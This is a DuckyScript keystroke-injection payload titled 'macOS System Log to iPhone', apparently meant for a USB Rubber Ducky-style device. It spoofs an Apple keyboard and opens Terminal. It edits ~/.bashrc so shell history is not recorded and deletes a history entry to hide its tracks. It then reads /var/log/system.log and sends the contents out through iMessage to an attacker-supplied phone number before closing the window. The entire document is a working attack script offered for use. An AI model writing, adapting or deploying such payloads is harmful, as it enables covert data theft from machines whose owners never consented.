REM This script retrieves the contents of the system log located at /var/log/system.log
REM Then sends the Users System logs to your phone via text message
REM Replace 'ENTER PHONE NUMBER HERE' with your actual Phone number 
REM Shoutout to matthewkayne and 0iphor13 for the Phone code


REM Title: macOS System Log to iPhone
REM Author: Narsty
REM Target: MacOS 
REM Version: 1.0
REM Category: Recon

ID 05ac:021e Apple:Keyboard
DELAY 500
GUI SPACE
DELAY 500
STRING terminal
DELAY 1000
ENTER
DELAY 500
STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash
DELAY 500
ENTER
DELAY 500
STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }')
DELAY 500
ENTER
ENTER
DELAY 500
STRING  x=$(cat /var/log/system.log); osascript -e 'tell application "Messages" to send "'$x'" to buddy "ENTER PHONE NUMBER HERE"'
DELAY 500
ENTER
DELAY 5000
GUI k
DELAY 250
GUI w
